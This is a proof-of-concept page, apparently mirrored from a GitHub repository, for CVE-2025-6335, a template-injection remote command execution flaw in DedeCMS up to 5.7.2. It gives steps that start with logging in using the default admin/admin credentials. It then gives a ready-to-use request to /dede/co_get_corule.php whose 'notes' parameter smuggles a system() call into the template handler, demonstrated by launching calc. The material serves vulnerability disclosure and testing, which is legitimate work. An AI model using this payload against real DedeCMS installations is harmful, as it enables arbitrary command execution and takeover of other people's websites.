CVE-2025-6335 PoC — DedeCMS Template dedetag.class.php command injection

Source

https://github.com/jujubooom/CVE-2025-6335

Associated Vulnerability

Title:DedeCMS Template dedetag.class.php command injection (CVE-2025-6335)
Description:A vulnerability was found in DedeCMS up to 5.7.2 and classified as critical. This issue affects some unknown processing of the file /include/dedetag.class.php of the component Template Handler. The manipulation of the argument notes leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

Description

cve报告

Readme

## Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

**BUG_Author:** Ewoji

**Affected Version:**  dedeCMS < 5.7.2

**Vendor:** [Shanghai Zhuozhuo Network Technology Co., LTD](https://www.dedecms.com/)

**Software:** [dedeCMS](https://www.dedecms.com/download#download)

**Vulnerability Files:**
- `/include/dedetag.class.php`

## Description:

1. **After install，Log in to the background**
   - Use the default account password admin/admin

2. **Exploiting the Template**
   - Access the dede/co_get_corule.php interface
   - Pass in the parameter /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1,Accessing twice like this can execute the command

3. **Verifying the Exploit:**
   - If the injection is successful,The attacker will execute arbitrary commands

## Proof of Concept:

   ```
   /dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
   Accessing twice like this can execute the command
   ```
detail:[CVE-2025-6335-dedeCMS后台模板注入RCE](https://ewoji.cn/2025/06/20/CVE-2025-6335-dedeCMS%E5%90%8E%E5%8F%B0%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5RCE/)

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!